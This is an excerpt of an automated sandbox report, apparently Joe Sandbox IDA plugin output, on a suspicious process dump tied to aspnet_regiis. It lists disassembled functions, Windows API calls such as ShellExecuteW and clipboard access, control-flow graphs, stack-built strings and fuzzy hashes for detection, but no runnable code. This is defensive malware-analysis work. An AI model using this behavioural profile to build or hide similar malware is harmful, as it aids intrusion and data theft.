                                                                            • Snapshot File: hcaresult_3_2_3390000_aspnet_regiis.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ;:54
                                                                            • API String ID: 0-2887251705
                                                                            • Opcode ID: f0f57b41538f94d2920bd188ec99a1d0390b691f4925138d7b5183a886ca3b64
                                                                            • Instruction ID: 3a85120f101e38818699a33c4998f78bfabfe284065934821f4114921789a5ce
                                                                            • Opcode Fuzzy Hash: f0f57b41538f94d2920bd188ec99a1d0390b691f4925138d7b5183a886ca3b64
                                                                            • Instruction Fuzzy Hash: ACF145B6E01206CFDB04CF68D8817AEB7B6FF89300F2981A8D545AB785D7759942CF90
                                                                            Function 033D0D90 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LdrInitializeThunk.NTDLL(033D40E0,005C003F,00000002,00000018,?), ref: 033D0DBE
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2236254867.0000000003391000.00000020.00000400.00020000.00000000.sdmp, Offset: 03390000, based on PE: true
                                                                            • Associated: 00000003.00000002.2236239329.0000000003390000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236304038.00000000033D9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236321793.00000000033E9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3390000_aspnet_regiis.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                            • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
                                                                            • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                            • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82
                                                                            Function 0339D0B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 142threadCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1441 339d0b0-339d0bf 1442 339d0c0-339d0d2 1441->1442 1442->1442 1443 339d0d4-339d0de call 33cfad0 1442->1443 1446 339d0e4-339d0eb call 33c7d30 1443->1446 1447 339d277-339d279 ExitProcess 1443->1447 1450 339d0f1-339d17e GetCurrentThreadId 1446->1450 1451 339d272 call 33d0ca0 1446->1451 1452 339d180-339d192 1450->1452 1451->1447 1452->1452 1454 339d194-339d197 1452->1454 1455 339d19d-339d1da 1454->1455 1456 339d24f-339d257 GetForegroundWindow 1454->1456 1457 339d1e0-339d1f2 1455->1457 1458 339d259 GetCurrentProcessId 1456->1458 1459 339d25f-339d266 call 339e1c0 1456->1459 1457->1457 1460 339d1f4-339d213 1457->1460 1458->1459 1459->1451 1465 339d268 call 33a07e0 1459->1465 1462 339d220-339d234 1460->1462 1462->1462 1464 339d236-339d249 ShellExecuteW 1462->1464 1464->1456 1467 339d26d call 339f960 1465->1467 1467->1451
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 0339D165
                                                                            • ShellExecuteW.SHELL32(00000000,81368735,033D8050,?,00000000,00000005), ref: 0339D249
                                                                            • GetForegroundWindow.USER32(?,00000000,00000005), ref: 0339D24F
                                                                            • GetCurrentProcessId.KERNEL32(?,00000000,00000005), ref: 0339D259
                                                                            • ExitProcess.KERNEL32 ref: 0339D279
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2236254867.0000000003391000.00000020.00000400.00020000.00000000.sdmp, Offset: 03390000, based on PE: true
                                                                            • Associated: 00000003.00000002.2236239329.0000000003390000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236304038.00000000033D9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236321793.00000000033E9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3390000_aspnet_regiis.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentProcess$ExecuteExitForegroundShellThreadWindow
                                                                            • String ID: ps
                                                                            • API String ID: 1013327911-2817149839
                                                                            • Opcode ID: a36086e2e28cee1dcb1ffc45b18ea76cf87a47a73e6f4fe8cf8b95d4be21f264
                                                                            • Instruction ID: b976c80cb241438214e78c21443e0c66aff4c636e8e78030c30fdd623552aad8
                                                                            • Opcode Fuzzy Hash: a36086e2e28cee1dcb1ffc45b18ea76cf87a47a73e6f4fe8cf8b95d4be21f264
                                                                            • Instruction Fuzzy Hash: 694101312083409BEB04AB79A89A36FBBDA9FC6714F19891DD4C1DF281CA7894068B52
                                                                            Function 033D0F20 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1693 33d0f20-33d0f3a 1694 33d0f40-33d0f5b 1693->1694 1694->1694 1695 33d0f5d-33d0fa7 GetForegroundWindow call 33d3bb0 1694->1695
                                                                            APIs
                                                                            • GetForegroundWindow.USER32 ref: 033D0F76
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2236254867.0000000003391000.00000020.00000400.00020000.00000000.sdmp, Offset: 03390000, based on PE: true
                                                                            • Associated: 00000003.00000002.2236239329.0000000003390000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236304038.00000000033D9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236321793.00000000033E9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3390000_aspnet_regiis.jbxd
                                                                            Similarity
                                                                            • API ID: ForegroundWindow
                                                                            • String ID: 2123
                                                                            • API String ID: 2020703349-208623094
                                                                            • Opcode ID: da1a27c50c8ad60bc2e641fbd69d46834275d91c138a9d2bc7026357f6ce1b6d
                                                                            • Instruction ID: 3dbf97ec74f64e8e2f7e216d8b5a956b7194f4f1ed9a3b1977ce7a706554cdcd
                                                                            • Opcode Fuzzy Hash: da1a27c50c8ad60bc2e641fbd69d46834275d91c138a9d2bc7026357f6ce1b6d
                                                                            • Instruction Fuzzy Hash: C5F04C3A5183505BE304EB38F4C12267BA9E781318F04491DE4D1CF394C734C841CF02
                                                                            Function 033A07F7 Relevance: 2.6, APIs: 2, Instructions: 97COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CoInitialize.OLE32(00000000), ref: 033A07F9
                                                                            • CoInitialize.OLE32(00000000), ref: 033A0900
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2236254867.0000000003391000.00000020.00000400.00020000.00000000.sdmp, Offset: 03390000, based on PE: true
                                                                            • Associated: 00000003.00000002.2236239329.0000000003390000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236304038.00000000033D9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236321793.00000000033E9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3390000_aspnet_regiis.jbxd
                                                                            Similarity
                                                                            • API ID: Initialize
                                                                            • String ID:
                                                                            • API String ID: 2538663250-0
                                                                            • Opcode ID: 2d759cee67459cd891414af48ecd48035c448e74558bb4fbc530de375dfc16b1
                                                                            • Instruction ID: 1f9e5fdf28195ed6012b6889e1c304fb8c9d3812a55bd3b0d547f2e97b84aa4a
                                                                            • Opcode Fuzzy Hash: 2d759cee67459cd891414af48ecd48035c448e74558bb4fbc530de375dfc16b1
                                                                            • Instruction Fuzzy Hash: 4431C7B4C10B40AFD770BF3D9A0B6167EB4AB05650F504B1DF8E69A6D4E230A4298BD7
                                                                            Function 0339E1C0 Relevance: 1.6, APIs: 1, Instructions: 90libraryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 2064 339e1c0-339e1f7 2065 339e200-339e220 2064->2065 2065->2065 2066 339e222-339e25b 2065->2066 2067 339e260-339e27c 2066->2067 2067->2067 2068 339e27e-339e296 LoadLibraryExW call 33cf7a0 2067->2068 2071 339e29d-339e29f 2068->2071 2072 339e2a1-339e2e4 call 33d33b0 * 3 2068->2072 2073 339e2f1-339e2fb 2071->2073 2072->2073
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(611D67ED,00000000,E3E2F9E0), ref: 0339E286
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2236254867.0000000003391000.00000020.00000400.00020000.00000000.sdmp, Offset: 03390000, based on PE: true
                                                                            • Associated: 00000003.00000002.2236239329.0000000003390000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236304038.00000000033D9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236321793.00000000033E9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3390000_aspnet_regiis.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: 1604c4a3db83afdae7d5f6fe4e966da2b487dad02112f0b08caba9b1c7edf291
                                                                            • Instruction ID: 408069e6ba3b21591be35b526c83cc20c22ddac574c655c53abf46df6087fab1
                                                                            • Opcode Fuzzy Hash: 1604c4a3db83afdae7d5f6fe4e966da2b487dad02112f0b08caba9b1c7edf291
                                                                            • Instruction Fuzzy Hash: 702188799083809FD304EF25FDC169F7BA5FBC6304F088C2DE1956B206D735491A87A2
                                                                            Function 033D0676 Relevance: 1.6, APIs: 1, Instructions: 76libraryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 2080 33d0676-33d06bf 2081 33d06c0-33d06fe 2080->2081 2081->2081 2082 33d0700-33d0715 LoadLibraryExW 2081->2082 2083 33d071b-33d074a 2082->2083 2084 33d0c46-33d0c93 2082->2084 2083->2084
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(D768C967,00000000,00000800), ref: 033D070C
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2236254867.0000000003391000.00000020.00000400.00020000.00000000.sdmp, Offset: 03390000, based on PE: true
                                                                            • Associated: 00000003.00000002.2236239329.0000000003390000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236304038.00000000033D9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236321793.00000000033E9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3390000_aspnet_regiis.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: 22d7b36ca62ecaf3807e30d5a8ab004a818011af0d272356d8bef5b351761e00
                                                                            • Instruction ID: 810b55efc77b4018124ac93255ac03791e7c8b96d5d5cfd9557a27255d1f7d48
                                                                            • Opcode Fuzzy Hash: 22d7b36ca62ecaf3807e30d5a8ab004a818011af0d272356d8bef5b351761e00
                                                                            • Instruction Fuzzy Hash: 1D31017A20E3809FD344DF38E4C024BBBE1AB89300F588D1EE4C89B381D674D504CB52
                                                                            Function 033CDC40 Relevance: 1.5, APIs: 1, Instructions: 49memoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 2086 33cdc40-33cdc51 2087 33cdc58-33cdc6b 2086->2087 2088 33cdcd3-33cdcda 2086->2088 2089 33cdc70-33cdcbc 2087->2089 2089->2089 2090 33cdcbe-33cdccd RtlFreeHeap 2089->2090 2090->2088
                                                                            APIs
                                                                            • RtlFreeHeap.NTDLL(?,00000000,?), ref: 033CDCCD
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2236254867.0000000003391000.00000020.00000400.00020000.00000000.sdmp, Offset: 03390000, based on PE: true
                                                                            • Associated: 00000003.00000002.2236239329.0000000003390000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236304038.00000000033D9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236321793.00000000033E9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3390000_aspnet_regiis.jbxd
                                                                            Similarity
                                                                            • API ID: FreeHeap
                                                                            • String ID:
                                                                            • API String ID: 3298025750-0
                                                                            • Opcode ID: 51864c1831be5d9253c9b5c8801e8a2c2148e58ac23da678febb2d1b31ed80d8
                                                                            • Instruction ID: 267b8a0fcdd502cc10711e36977890c91491a452c32b537f7b26c01cc94b12c8
                                                                            • Opcode Fuzzy Hash: 51864c1831be5d9253c9b5c8801e8a2c2148e58ac23da678febb2d1b31ed80d8
                                                                            • Instruction Fuzzy Hash: 0C0197BB65C3584FC7006E90ECD86A6BBA8EFD0304F08803DD6804A681CAFB2D19C742
                                                                            Function 033C1859 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 2091 33c1859-33c18c3 call 33ac2a0 CoSetProxyBlanket
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2236254867.0000000003391000.00000020.00000400.00020000.00000000.sdmp, Offset: 03390000, based on PE: true
                                                                            • Associated: 00000003.00000002.2236239329.0000000003390000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236304038.00000000033D9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236321793.00000000033E9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3390000_aspnet_regiis.jbxd
                                                                            Similarity
                                                                            • API ID: BlanketProxy
                                                                            • String ID:
                                                                            • API String ID: 3890896728-0
                                                                            • Opcode ID: a3a7baa459f013981d8d6bdee8c8e7cc5ea3e431e4121085d61ca85de71f7074
                                                                            • Instruction ID: 16ea4e5b52eb642f158d8322aaa0a21f30a2e86541c294286b0fc0df96a6442b
                                                                            • Opcode Fuzzy Hash: a3a7baa459f013981d8d6bdee8c8e7cc5ea3e431e4121085d61ca85de71f7074
                                                                            • Instruction Fuzzy Hash: 2DF07FB12097029FE311DF64D1A874BBBE5AB81304F10891CE4E58B290C7B9AA498FC2
                                                                            Function 033C4A7F Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2236254867.0000000003391000.00000020.00000400.00020000.00000000.sdmp, Offset: 03390000, based on PE: true
                                                                            • Associated: 00000003.00000002.2236239329.0000000003390000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236304038.00000000033D9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236321793.00000000033E9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3390000_aspnet_regiis.jbxd
                                                                            Similarity
                                                                            • API ID: BlanketProxy
                                                                            • String ID:
                                                                            • API String ID: 3890896728-0
                                                                            • Opcode ID: 855c03d87ad76fef3c530b3141d8e4dcf62fc460df068663abba2062dc221312
                                                                            • Instruction ID: 02a6d4c9dad7f0e568fb8d9619ebbc15642b8ba2fd39861ae75d7aff935671c2
                                                                            • Opcode Fuzzy Hash: 855c03d87ad76fef3c530b3141d8e4dcf62fc460df068663abba2062dc221312
                                                                            • Instruction Fuzzy Hash: 3EF022B450D341DFE721EF29D1A871ABBE4BB84344F118A1CE4988B290D7B995598F82
                                                                            Function 033D0F68 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetForegroundWindow.USER32 ref: 033D0F76
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2236254867.0000000003391000.00000020.00000400.00020000.00000000.sdmp, Offset: 03390000, based on PE: true
                                                                            • Associated: 00000003.00000002.2236239329.0000000003390000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236304038.00000000033D9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236321793.00000000033E9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3390000_aspnet_regiis.jbxd
                                                                            Similarity
                                                                            • API ID: ForegroundWindow
                                                                            • String ID:
                                                                            • API String ID: 2020703349-0
                                                                            • Opcode ID: 54265c1db3316747ba15a9a41a28426144d95cdd162df75e17b454eff407af50
                                                                            • Instruction ID: c4e8174f6de460a159c8c1fc734d4624d44097c14369856e77328e81cc02a38f
                                                                            • Opcode Fuzzy Hash: 54265c1db3316747ba15a9a41a28426144d95cdd162df75e17b454eff407af50
                                                                            • Instruction Fuzzy Hash: FAE08C7AA102009FD624FB24F4D14253BA8F709309B000819E483CF385CB3199A4DF02
                                                                            Function 033CA952 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 033CA965
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2236254867.0000000003391000.00000020.00000400.00020000.00000000.sdmp, Offset: 03390000, based on PE: true
                                                                            • Associated: 00000003.00000002.2236239329.0000000003390000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236304038.00000000033D9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236321793.00000000033E9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3390000_aspnet_regiis.jbxd
                                                                            Similarity
                                                                            • API ID: BlanketProxy
                                                                            • String ID:
                                                                            • API String ID: 3890896728-0
                                                                            • Opcode ID: fe4c2add30bd08712bcb0664d2d8123ffc9fc66e5a3fc1eb588ef85a069ec590
                                                                            • Instruction ID: 4b59dc579d988d96171f8be49130dc28fef57e084133bb0216e5ce9d6c92048d
                                                                            • Opcode Fuzzy Hash: fe4c2add30bd08712bcb0664d2d8123ffc9fc66e5a3fc1eb588ef85a069ec590
                                                                            • Instruction Fuzzy Hash: 27D09230381700BBE2319A14ECA6F11B3A9BB49F01F204508F7866F9D4CAB1BA218B04
                                                                            Function 033CDC18 Relevance: 1.5, APIs: 1, Instructions: 11memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(?,00000000,?,?,00000000), ref: 033CDC24
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2236254867.0000000003391000.00000020.00000400.00020000.00000000.sdmp, Offset: 03390000, based on PE: true
                                                                            • Associated: 00000003.00000002.2236239329.0000000003390000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236304038.00000000033D9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236321793.00000000033E9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3390000_aspnet_regiis.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateHeap
                                                                            • String ID:
                                                                            • API String ID: 1279760036-0
                                                                            • Opcode ID: ca5aa48af43f5c5329a6c7feb9cef9e6cdfa5bbdbbf7228ea68fa585789ad6d4
                                                                            • Instruction ID: 67e40147f7a9cd83b509a38f1906e659ac477d42faa4dc7a27659dce7dd834f3
                                                                            • Opcode Fuzzy Hash: ca5aa48af43f5c5329a6c7feb9cef9e6cdfa5bbdbbf7228ea68fa585789ad6d4
                                                                            • Instruction Fuzzy Hash: DBB01230147110B8D03126111CC5FFF6C7CAF43F59F102004B204280C00754A001D07D

                                                                            Non-executed Functions

                                                                            Function 033C5210 Relevance: 31.6, APIs: 6, Strings: 12, Instructions: 120clipboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2236254867.0000000003391000.00000020.00000400.00020000.00000000.sdmp, Offset: 03390000, based on PE: true
                                                                            • Associated: 00000003.00000002.2236239329.0000000003390000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236304038.00000000033D9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236321793.00000000033E9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3390000_aspnet_regiis.jbxd
                                                                            Similarity
                                                                            • API ID: Clipboard$CloseDataLongOpenWindow
                                                                            • String ID: I$K$L$N$V$V$X$Y$Y$]$_$q
                                                                            • API String ID: 1647500905-2073889574
                                                                            • Opcode ID: 0f64aca2af7ee9f8e2c85f3edebf46da3507f88b3355ed44e22096ac16f3a127
                                                                            • Instruction ID: 7fbb4024c293f51b7563c049b02dc73554e0599f1123f4557a7d864ee6fb9517
                                                                            • Opcode Fuzzy Hash: 0f64aca2af7ee9f8e2c85f3edebf46da3507f88b3355ed44e22096ac16f3a127
                                                                            • Instruction Fuzzy Hash: 52415EB150C781CFE300FF79D58836FBFE4AB52314F05486DD5C98A282D6B999488763
                                                                            Function 033AE298 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindWindowExW.USER32(00000000,?,A3D19DEA,00000000), ref: 033AE410
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2236254867.0000000003391000.00000020.00000400.00020000.00000000.sdmp, Offset: 03390000, based on PE: true
                                                                            • Associated: 00000003.00000002.2236239329.0000000003390000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236304038.00000000033D9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236321793.00000000033E9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3390000_aspnet_regiis.jbxd
                                                                            Similarity
                                                                            • API ID: FindWindow
                                                                            • String ID:
                                                                            • API String ID: 134000473-0
                                                                            • Opcode ID: 56cbeb775b16895ec885ebc543362d796aff16b5a6321c1007a84a9c958b753a
                                                                            • Instruction ID: 19868295c913e99815f1030f73183105e5fde1d9307ddac884a3be5ddf2a3aba
                                                                            • Opcode Fuzzy Hash: 56cbeb775b16895ec885ebc543362d796aff16b5a6321c1007a84a9c958b753a
                                                                            • Instruction Fuzzy Hash: 3CD1EC756087918FC725CF28D89066EBBE2EFC9304F09896DE4999B385DB70D905CB82
                                                                            Function 033C59B7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2236254867.0000000003391000.00000020.00000400.00020000.00000000.sdmp, Offset: 03390000, based on PE: true
                                                                            • Associated: 00000003.00000002.2236239329.0000000003390000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236304038.00000000033D9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236321793.00000000033E9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3390000_aspnet_regiis.jbxd
                                                                            Similarity
                                                                            • API ID: MetricsSystem
                                                                            • String ID:
                                                                            • API String ID: 4116985748-3916222277
                                                                            • Opcode ID: 53504db39dbb3948e371c418c034cdbf2446529c769685fcdced0163deac2702
                                                                            • Instruction ID: 6d2e1b56abcfc6dbf695a6c0aeca91d11c37d5b942dafda0053ef31a0d9621e2
                                                                            • Opcode Fuzzy Hash: 53504db39dbb3948e371c418c034cdbf2446529c769685fcdced0163deac2702
                                                                            • Instruction Fuzzy Hash: DD5180B0E152089FCB40EFACE58169DBBF4BB48300F108529E898E7354D734AD55CF92
                                                                            Function 033C3950 Relevance: .1, Instructions: 87COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2236254867.0000000003391000.00000020.00000400.00020000.00000000.sdmp, Offset: 03390000, based on PE: true
                                                                            • Associated: 00000003.00000002.2236239329.0000000003390000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236304038.00000000033D9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236321793.00000000033E9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3390000_aspnet_regiis.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 15c2d990848bbd9c8500d4fcd49ccea1da3e79641c0883768ed45fed22fd30b4
                                                                            • Instruction ID: 5c825a67deef6ea29ede40796b9e7b559ee28fbfc3c69fea73f3047379a7c08b
                                                                            • Opcode Fuzzy Hash: 15c2d990848bbd9c8500d4fcd49ccea1da3e79641c0883768ed45fed22fd30b4
                                                                            • Instruction Fuzzy Hash: F85109BA06A3C19BE770DF55E5987CBBAF4AB85308F10990C94DC1A352CB765188CF86
                                                                            Function 033C44AC Relevance: 52.7, APIs: 1, Strings: 29, Instructions: 163memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2236254867.0000000003391000.00000020.00000400.00020000.00000000.sdmp, Offset: 03390000, based on PE: true
                                                                            • Associated: 00000003.00000002.2236239329.0000000003390000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236304038.00000000033D9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236321793.00000000033E9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3390000_aspnet_regiis.jbxd
                                                                            Similarity
                                                                            • API ID: AllocString
                                                                            • String ID: 0$A$C$E$E$E$G$I$L$M$O$V$X$a$c$d$e$g$i$k$m$o$q$s$u$w$y${$}
                                                                            • API String ID: 2525500382-1585318030
                                                                            • Opcode ID: 2af4bac00a47341f0286deaa31c152fbff0a77ea8e8996c47ae50d0681933831
                                                                            • Instruction ID: acca40306eae98b8a9736b99911992dbe156d883a8df5339f5550f6f326e1c1c
